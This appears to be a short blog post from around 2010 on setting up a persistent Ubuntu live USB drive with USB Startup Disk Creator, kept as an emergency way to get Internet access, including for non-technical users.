The drawback of being persistent is that the risk of also infecting the USB drive exists. However, the advantage of persistence is that we can configure it beforehand so that the Ubuntu installation on it already knows our router and network configuration. This is especially welcome if the ultimate user of the USB drive will be an IT layman.

How to do it? Download the preferred ISO image to install on the USB drive, go to System, Administration, USB Startup Disk Creator (present in Ubuntu 9.04 and 9.10) and configure the wizard similarly to this screenshot.



Keep the newly installed USB drive in a safe place and test it regularly. One unexpected day, it could become the key to having Internet access available.

Happy New Availability (and 2010)!